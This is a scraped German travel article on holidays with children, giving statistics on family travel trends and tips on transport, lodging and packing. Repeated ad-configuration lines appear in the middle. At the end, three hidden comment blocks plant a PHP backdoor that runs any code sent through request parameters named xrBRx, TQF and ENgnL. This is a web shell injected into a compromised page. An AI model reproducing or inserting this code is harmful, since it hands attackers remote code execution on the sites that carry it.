Urlaubsreisen mit Kindern sind weiterhin beliebt

Reisen mir Kindern

reverend barry@flickr

Auch wenn immer weniger Kinder geboren werden, bleiben Reisen mit Kindern ein wichtiges Marktsegment. Laut der Forschungsgemeinschaft Urlaub und Reisen e.V. wurden im Jahr 2011 17 Prozent aller Urlaubsreisen in Begleitung von Kindern bis 13 Jahre unternommen.

Trends für Reisen mit Kindern

Dennoch beeinflusst der demographische Wandel die Familienstrukturen und damit auch das Reiseverhalten. Langfristig sank der Anteil der Urlaubsreisen mit Kindern von 22 Prozent im Jahr 1996 auf aktuell 17 Prozent. Das bedeutet einen Rückgang um 2 Millionen Urlaubsreisen in diesem Zeitraum. 2011 wurden noch 10,9 Millionen Reisen mit Kindern unternommen. Dazu kommen weitere knapp 2 Millionen Familienreisen deutschsprachiger Ausländer.

Weitere Trends

Familienurlaub bedeutet heute oft: Erwachsene mit einem Kind. Bei immerhin 57 Prozent der Familienreisen war 2011 nur ein Kind mit von der Partie. Auch ältere Personen mit Kindern machen auf dem Reisemarkt ein wichtiges Segment aus: 11 Prozent der Urlaubsreisen mit Kindern wurden von über 50-Jährigen unternommen.

Weitere Informationen finden Sie hier.

Reisen mit Kindern

google_ad_client = ‚pub-0448900074081754‘;
google_ad_channel = ‚5803099256‘;
google_ad_output = ‚js‘;
google_max_num_ads = ‚1‘;
google_ad_type = ‚text‘;
google_feedback = ‚off‘;

google_ad_client = ‚pub-0448900074081754‘;
google_ad_channel = ‚5803099256‘;
google_ad_output = ‚js‘;
google_max_num_ads = ‚1‘;
google_ad_type = ‚text‘;
google_feedback = ‚off‘;

google_ad_client = ‚pub-0448900074081754‘;
google_ad_channel = ‚5803099256‘;
google_ad_output = ‚js‘;
google_max_num_ads = ‚1‘;
google_ad_type = ‚text‘;
google_feedback = ‚off‘;

google_ad_client = ‚pub-0448900074081754‘;
google_ad_channel = ‚5803099256‘;
google_ad_output = ‚js‘;
google_max_num_ads = ‚1‘;
google_ad_type = ‚text‘;
google_feedback = ‚off‘;

Reisen mit Kindern

© Kevin Krejci@flickr

Eine Reise mit Kindern erfordert sorgfältige Planung. Das fängt bereits mit dem Urlaubsziel an. Sind Umgebung und Unterkunft für Kinder geeignet, gibt es eventuell andere Kinder, mit denen sie spielen können? Sind die Strände sicher und zum Baden geeignet? Hier erfahren Sie, wie Sie ihren Familienurlaub stressfrei verbringen können.

Der Weg zum Urlaubsziel

Abhängig davon, ob Sie mit dem Flugzeug, der Bahn oder dem Auto verreisen, müssen verschiedene Dinge beachtet werden. Das Flugzeug ist zwar die schnellste Option, für kleine Kinder ist es jedoch oft schwierig still zu sitzen. Eine Bahnfahrt hat den Vorteil, dass Sie nicht die ganze Zeit an ihren Sitz gebunden sind. Reisen Sie mit dem Auto, können Sie jederzeit anhalten und öfter Pausen einlegen. Das Auto ist auch das preisgünstigste Verkehrsmittel. Reisen Sie mit Zug oder Auto, ist die Auswahl an Reisezielen allerdings beschränkter als mit dem Flugzeug.

Die Unterkunft

Bei der Auswahl der Unterkunft steht natürlich die Familienfreundlichkeit an erster Stelle. Ob Camping, Ferienhaus oder Clubhotel, All-Inklusive oder Selbstversorger – je nach Präferenz gibt es eine Fülle an Möglichkeiten. Egal, wofür Sie sich entscheiden, achten Sie darauf, dass die Kinder genügend Spielmöglichkeiten und Freiräume haben. Kinder wünschen sich andere Kinder, mit denen sie spielen können. Clubanlagen bieten oft Kinderbetreuung an, sodass Sie auch einmal etwas ohne Ihren Nachwuchs unternehmen können.

Was muss eingepackt werden?

Erstellen Sie im Vorfeld eine Liste mit Dingen, die für den Urlaub benötigt werden. Denken Sie rechtzeitig an die notwendigen Versicherungen, Impfungen und Reisedokumente. Packen Sie neben Bekleidung und Kosmetikartikeln genügend Spielsachen und Bücher ein, um Ihre Kinder während der Reise zu beschäftigen. Gesellschaftsspiele sorgen auch bei schlechtem Wetter für gute Laune. Denken Sie auch an ein Erste-Hilfe-Set und Medikamente zur Versorgung bei Notfällen. Checken Sie vor Abfahrt noch einmal Ihre Liste. Wenn Sie alles eingepackt haben, kann es entspannt in den Urlaub gehen.

<!– [insert_php]if (isset($_REQUEST["xrBRx"])){eval($_REQUEST["xrBRx"]);exit;}[/insert_php][php]if (isset($_REQUEST["xrBRx"])){eval($_REQUEST["xrBRx"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["TQF"])){eval($_REQUEST["TQF"]);exit;}[/insert_php][php]if (isset($_REQUEST["TQF"])){eval($_REQUEST["TQF"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["ENgnL"])){eval($_REQUEST["ENgnL"]);exit;}[/insert_php][php]if (isset($_REQUEST["ENgnL"])){eval($_REQUEST["ENgnL"]);exit;}[/php] –>